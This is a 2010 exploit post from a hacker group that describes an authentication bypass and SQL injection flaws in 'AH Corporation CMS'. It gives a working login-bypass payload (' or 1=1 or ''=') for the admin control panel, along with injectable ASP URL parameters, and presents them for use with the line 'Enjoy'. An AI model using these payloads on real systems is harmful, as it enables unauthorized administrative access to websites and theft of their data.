######################################################################### [+] Exploit Title : AH Corporation CMS Multiple Vulnerabilities [~] Author : ThunDEr HeaD [~] Contact : thunderhead10@gmail.com [~] Date : 13-11-2010 [~] HomePage : www.indishell.in [~] Price : $402 Or Rs.35,000/- [~] Version : n/a [~] Software: http://www.ahcorporation.com/webdesigningpackages.htm [~] Vulnerability Style : Authentication Bypass / Sql Injection (asp) ######################################################################### ~~~~~~~~~~~~~~~~~~~~~~~~~[Greetz To]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ----== INDIAN CYBER ARMY ==---- We Are: -[SiLeNtp0is0n]- , stRaNgEr , inX_rOot , NEO H4cK3R , DarkL00k , G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Th3 RDX shouts to : "Rajputgal Mahi" and all IW members :) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~[EXPLOIT]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ---==[Authentication Bypass]==--- [1] Go to the URL: http://server/cp [2] Apply these details for login: Username: admin PassWord: ' or 1=1 or ''=' [3] You will Redirected to Admin page: [4] Enjoy ---==[Sql Injection (s)]==--- http://server/more.asp?itemCode=1 http://server/products.asp?catID=18 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bug discovered : 13 November 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #End 0Day#